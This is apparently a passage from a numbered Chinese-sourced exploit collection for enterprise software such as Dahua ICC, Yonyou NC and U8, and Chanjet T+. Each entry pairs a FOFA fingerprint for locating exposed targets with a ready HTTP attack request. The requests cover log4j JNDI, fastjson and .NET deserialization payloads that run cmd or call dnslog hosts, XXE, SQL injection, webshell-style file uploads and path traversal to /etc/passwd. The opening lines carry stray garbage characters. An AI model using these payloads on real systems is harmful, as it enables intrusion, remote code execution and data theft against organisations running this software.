0 A! M: I. I( r$ D6 q0 F3 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; {7 h" z/ a% F. z8 `4 GContent-Length: 161
! ]- W& Y& r8 S3 R2 }0 d: K5 \! _Accept-Encoding: gzip; e5 g( G2 ~8 V/ H$ \
Connection: close
/ k, E+ S' p( D* F2 i/ t7 A9 A5 @Content-Type: application/json;charset=utf-8
# z) z1 X/ E! w6 q' S0 \" G
! T$ H4 h' C! K9 G{
! x" ?( ~0 }' c* R% y"a":{
4 x9 `3 c/ u7 `   "@type":"com.alibaba.fastjson.JSONObject",
/ I' z% G) Y; o  p6 |$ W5 Q    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}" S0 f7 p! ~# x9 \3 J* [
  }""
' T2 @" P& z) ^, z6 @% L) K4 z}
4 I/ b. S* w7 d( G4 S' ^
' J) S" l; _+ d' z! Q" h4 V, W. z4 e8 g" }& V+ J
22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 b: O7 T6 @+ r8 b7 s
FOFA:icon_hash="-1935899595"
' W6 e. h) ~( t! p( Y5 [POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1/ w$ E6 d# l3 Q2 n& }
Host: your-ip
0 d" g7 ~/ n6 v5 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 c) C( P5 e. C( T& A5 s. UContent-Type: application/json;charset=utf-8
4 l+ s3 B' n% n" s$ U
! w5 v& V3 ~! g7 V* j0 U, C{. `6 [* K% ~% P/ Z9 {" V( k/ z  D  H- [
"loginName":"${jndi:ldap://dnslog}": R% i# d* y7 M6 M) w1 {" e
}
. a( g; X# @7 |+ N. m
. x% E9 Z' b; J) ]# p
7 r# j9 j( j3 Z/ F2 {% e0 X* O* a
7 I  ]$ _3 X* j  i6 f23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% g/ W8 |+ a1 m& ^9 C2 D5 k. {
FOFA:icon_hash="-1935899595"
/ l3 Y6 s0 n2 `7 h$ UPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
' O3 P  {- L% l  u1 V- qHost: your-ip
0 C0 {0 x7 S, P' P  ^1 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 V* o# B' H+ F4 |Content-Type: application/json;charset=utf-8
! H8 W/ o% ^- N) H# mAccept-Encoding: gzip
9 l6 _; _: Z' U  x( pConnection: close
# ]! \# f' Z* `* K" r9 C" K
! ^, H3 G$ v1 H! v" U. Y{# D/ p1 o% [3 c8 m; g
    "a":{3 a0 z4 r- ]: L5 ^$ q3 ~
        "@type":"com.alibaba.fastjson.JSONObject",
! E6 F0 c% T0 i) h3 R1 \       {"@type":"java.net.URL","val":"http://DNSLOG"}
# K" F' g4 Z- v/ g6 M* K7 f. j        }""
( I6 K$ ]$ p& t; U3 u0 H}
# T/ l$ B9 `0 |' w
0 ]8 }3 i. H! O, `2 v2 H7 s' I: F* i6 v  v1 k4 L) Y1 B
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file is served at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file is served at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file is served at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Socialized Business ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
